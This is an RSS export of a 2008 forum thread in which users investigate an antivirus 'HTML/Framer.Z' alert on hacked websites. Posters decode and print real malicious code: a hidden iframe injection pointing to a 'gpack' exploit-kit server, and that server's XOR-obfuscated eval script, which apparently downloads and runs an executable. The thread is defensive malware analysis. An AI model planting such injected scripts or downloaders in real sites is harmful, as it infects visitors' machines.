<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0" xmlns:blogChannel="http://backend.userland.com/blogChannelModule">

<channel>
<title>Re: Question about HTML/Framer.Z in Security</title>
<link>http://www.dslreports.com/forum/r20257463</link>
<description></description>
<language>en</language>
<pubDate>Fri, 27 Nov 2009 04:51:10 EDT</pubDate>
<lastBuildDate>Fri, 27 Nov 2009 04:51:10 EDT</lastBuildDate>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20291850</link>
<description><![CDATA[<A HREF="/useremail/u/548172"><b>foxsteve</b></A> : If this is information from <b>Piu Lo</b> :)<br><div class="bquote">nic-hdl: PL466-AP<br>e-mail: ipadmin@hostfresh.com<br>address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong<br>phone: +852-35979788<br>fax-no: +852-24522539<br></div>....<br><br>>tracert 58.65.232.33<br><br>Tracing route to oracle.dmain.name [58.65.232.33]<br>over a maximum of 30 hops:<br>...............<br>8   126 ms   127 ms   127 ms  po12- 0.cr2.nrt1.asianetcom.net [202.147.50.146]<br><br>9   183 ms   185 ms   183 ms  gi6-2.cr1.hkg3.asianetcom.net [202.147.16.93]<br><br>10   190 ms   188 ms   190 ms  po15-0.gw2.hkg3.asianetcom.net [202.147.16.210]<br><br>11   187 ms   186 ms   187 ms  HFI-0002.gw2.hkg3.asianetcom.net [202.147.17.90]<br><br>12   187 ms   186 ms   187 ms  58.65.235.230<br><br>13   186 ms   187 ms   187 ms  116.50.12.10<br><br>14   182 ms   183 ms   184 ms  oracle.dmain.name [58.65.232.33]]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20291850</guid>
<pubDate>Sun, 06 Apr 2008 13:08:09 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20291434</link>
<description><![CDATA[<A HREF="/useremail/u/618942"><b>bobince</b></A> :  <blockquote><small>quote:</small><hr>As you see that server is located in Hong-Kong and it is not Russia<hr></blockquote><br><br>True, that's where it's hosted, but the operators of the server are almost certainly members of Russian-language malware community and not residents of HK.<br><br>HostFresh is a black-hat provider of dedicated servers catering primarily to the Russians. It was previously housed alongside another major black-hat ISP, Esthost, in the Atrivo/Intercage Netblock of Hell.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20291434</guid>
<pubDate>Sun, 06 Apr 2008 11:35:18 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20288785</link>
<description><![CDATA[<A HREF="/useremail/u/548172"><b>foxsteve</b></A> : That sequence (%77%69%6e%64%6f%77%2e...) may be decoded as here<br><br><b>window.status='Done';document.write('&#60;iframe name=a0a5a src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*43280)+'8b6\' width=541 height=80 style=\'display: none\'&#62;&#60;/iframe&#62;')<br></b><br>Only one website was found with this IP 58.65.232.33, however this website was not related to any domain name. <br><br><i><b>Additional information.</b></i><br><br>This IP is allocated to APNIC (Asia Pacific Network Information Centre)<br>Address:    PO Box 2131<br>City:       Milton<br>StateProv:  QLD<br>PostalCode: 4064<br>Country:    AU<br><br>inetnum:      58.65.232.0 - 58.65.239.255<br>netname:      HOSTFRESH<br>descr:        Internet Service Provider<br>status:       ALLOCATED PORTABLE<br>person:       Piu Lo<br>nic-hdl:      PL466-AP<br>e-mail:       ipadmin@hostfresh.com<br>address:      No. 500, Post Office, Tuen Mun, N.T., Hong Kong<br>phone:        +852-35979788<br>fax-no:       +852-24522539<br>country:      HK<br><br>WEB site is active and here is a result of calling that URL http://58.65.232.33/gpack/index.php<br><textarea name="code" class="text" cols=50 rows=10>Requesting http://58.65.232.33/gpack/index.php .. Ok&#012;Reply received (reply time: 484 ms)&#012;-----------------------------------&#012;HTTP/1.1 200 OK&#012;Date: Sat, 05 Apr 2008 22:36:58 GMT&#012;Server: Apache/2.2.6 (Fedora)&#012;X-Powered-By: PHP/5.1.6&#012;Content-Length: 942&#012;Connection: close&#012;Content-Type: text/html&#012; &#012;&lt;html&gt;&lt;head&gt;&lt;meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"&gt;&lt;script language=JavaScript&gt;str = "ru`su)(:&amp;#12;gtobuhno!ru`su)(!z&amp;#12;w`s!fgg!&lt;!enbtldou/bsd`udDmdldou)&amp;nckdbu&amp;(:&amp;#12;fgg/rdu@uushctud)&amp;he&amp;-&amp;fgg&amp;(:&amp;#12;fgg/rdu@uushctud)&amp;bm`rrhe&amp;-&amp;bm&amp;*&amp;rh&amp;*#e;CE#*#87B4#*&amp;47,74@2,0&amp;*#0E1,89#*&amp;2@,11&amp;*#B15#*&amp;GB3&amp;*#8D#*&amp;27&amp;(:&amp;#12;usx!z&amp;#12;w`s!p!&lt;!fgg/Bsd`udNckdbu)&amp;lr&amp;*#yl#*&amp;m3&amp;*#/#*&amp;YL&amp;*#MI#*&amp;U&amp;*&amp;UQ&amp;-&amp;&amp;(:&amp;#12;w`s!r!&lt;!fgg/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&amp;&amp;(:&amp;#12;w`s!u!&lt;!fgg/Bsd`udNckdbu)&amp;`e&amp;*&amp;ne&amp;*#c/#*&amp;ru&amp;*#sd#*&amp;`l&amp;-&amp;&amp;(:&amp;#12;usx!z!u/uxqd!&lt;!0:&amp;#12;p/nqdo)&amp;F&amp;*#D#*&amp;U&amp;-&amp;iuuq;..49/74/323/22.fq`bj.mn`e/qiq&amp;-g`mrd(:&amp;#12;p/rdoe)(:!u/nqdo)(:&amp;#12;u/Vshud)p/sdrqnordCnex(:&amp;#12;w`s!o`ld!&lt;!&amp;/..//..hdyqmnsds/dyd&amp;:&amp;#12;u/R`wdUnGhmd)o`ld-3(:&amp;#12;u/Bmnrd)(:&amp;#12;|!b`ubi)d(!z|&amp;#12;usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||&amp;#12;b`ubi)d(z||";str2 = "";for (i = 0; i &lt; str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);&lt;/script&gt;&lt;/head&gt;&lt;/html&gt; &#012;</textarea><!--end code block--><br>PS. For <b><i> bobince <A HREF="/useremail/u/618942"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A></i></b><br>As you see that server is located in Hong-Kong and it is not Russia. :)]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20288785</guid>
<pubDate>Sat, 05 Apr 2008 18:21:28 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20287287</link>
<description><![CDATA[<A HREF="/useremail/u/0"><b>anon</b></A> : AVG 7.5 free addition is alerting to HTML/Framer.Z on this site: www.pci-golf.com.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20287287</guid>
<pubDate>Sat, 05 Apr 2008 12:16:06 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20281503</link>
<description><![CDATA[<A HREF="/useremail/u/618942"><b>bobince</b></A> :  <blockquote><small>quote:</small><hr>only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it<hr></blockquote><br><br>Not necessarily. AVs including Norton also trigger on encoded JavaScript snippets which end up document.write()ing redirections to exploits, regardless of whether the exploit at the end is actually reached. Occasionally this produces false positives with other encoded JavaScripts, but generally speaking obfuscated JavaScript is usually a sign that something dodgy is up.<br><br>Trying to come to a conclusion about whether a site is really hacked or not from the responses of popular AVs is a pointless task, as well as likely to get you infected. If you want to really know what's going on, you have to look at the code. It's not that hard and it's much more productive than arguing over which AV is the more canonical (tip: none of them are really that reliable).<br><br>So given the above post, we can guess the place to look is view-source:hxxp://tigerjimmytattoo.com/. Immediately obvious at the bottom of that is:<br><br>  {script}eval(unescape("%77%69%6e%64%6f%77%2e...<br><br>Code like this is an immediate big red flag.<br><br>Anyhow, should we try unescape()ing this manually, we find it writes out an iframe tag pointing to a 'gpack' exploit kit at 58.65.232.33, a server at known Russian-related malware host HostFresh. Currently the URL leads only to a 404, so it's not quite true to say the site is infected *right now*, but it's definitely been hacked and there probably have been/will be exploits from there at other times.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20281503</guid>
<pubDate>Fri, 04 Apr 2008 10:47:23 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20275245</link>
<description><![CDATA[<A HREF="/useremail/u/0"><b>anon</b></A> : I get the same virus notice from my AVG. I googled Tiger Jimmy tattoos. When at the site, i got the same message 3 times. AVG said it healed the virus. It did come up after running AVG.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20275245</guid>
<pubDate>Thu, 03 Apr 2008 09:25:57 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20259862</link>
<description><![CDATA[<A HREF="/useremail/u/299537"><b>sashwa</b></A> : Do not click the above link.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20259862</guid>
<pubDate>Mon, 31 Mar 2008 19:00:51 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20259153</link>
<description><![CDATA[<A HREF="/useremail/u/0"><b>anon</b></A> : I have been on vacation and just found out that my site is starting to do this as well.<br><br>[link removed]]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20259153</guid>
<pubDate>Mon, 31 Mar 2008 16:55:57 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20257475</link>
<description><![CDATA[<A HREF="/useremail/u/282410"><b>Sarah</b></A> : The page is gone now so there's nothing left to look at... he just tacked up a placeholder message saying it will be back up soon when he fixes it.<br><br>But that is good info re: Norton, I know my friend was using a recent version of Firefox so it's probably less likely to be vulnerable. <br><small>--<br><A HREF="http://www.dslreports.com/forum/pubgames">Killers and liars welcome</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20257475</guid>
<pubDate>Mon, 31 Mar 2008 12:01:29 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20257463</link>
<description><![CDATA[<A HREF="/useremail/u/1303852"><b>zteardrop</b></A> : FYI.. only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it. Its hard to say if its an FP without the URL. If you can PM me the URL I can take a look.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20257463</guid>
<pubDate>Mon, 31 Mar 2008 11:59:24 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20256572</link>
<description><![CDATA[<A HREF="/useremail/u/282410"><b>Sarah</b></A> : It was flagging the page with the forum list on it (basically its version of this page: &raquo;<A HREF="/forums/all">/forums/all</A>) which is also the main page of the forum... so I don't think it could be anything that was posted by a user. <br><br>I should add, if it matters, the page looked like it had been altered since there were error messages in it and people could not log in...<br><small>--<br><A HREF="http://www.dslreports.com/forum/pubgames">Killers and liars welcome</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20256572</guid>
<pubDate>Mon, 31 Mar 2008 09:22:31 EDT</pubDate>
</item>

<item>
<title>Re: Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20256486</link>
<description><![CDATA[<A HREF="/useremail/u/408621"><b>redwolfe_98</b></A> : i have seen times when "antivir" would flag some webpages just because someone had posted some "code" in one of the posts.. maybe avg is, similarly, flagging something like that? ]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20256486</guid>
<pubDate>Mon, 31 Mar 2008 08:58:03 EDT</pubDate>
</item>

<item>
<title>Question about HTML/Framer.Z</title>
<link>http://www.dslreports.com/forum/remark,20256422</link>
<description><![CDATA[<A HREF="/useremail/u/282410"><b>Sarah</b></A> : A website I frequent has been sending up flags that AVG has found "HTML/Framer.Z" upon loading the main web page. Talking to some other forum members (via e-mail since the forum is down now) it seems that everyone running AVG has seen this but someone running Norton finds nothing. No one seems to be seeing any kind of active infection; AVG is just flagging the cached pages from the infected site. After a full scan it did not find any other infected files. <br><br>I can find very little information about this particular problem and I'm wondering if anyone here can enlighten me? Should my friend with Norton be worried or is this something along the lines of a FP/overreaction with AVG? I'm thinking this may be a more common virus that AVG is just naming differently than everyone else but I don't know what exactly I need to be looking for. Google searches just reveal questions like mine ("I'm seeing this pop up, what should I do") and no real info about the virus in question. <br><small>--<br><A HREF="http://www.dslreports.com/forum/pubgames">Killers and liars welcome</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20256422</guid>
<pubDate>Mon, 31 Mar 2008 08:34:49 EDT</pubDate>
</item>

</channel>
</rss>
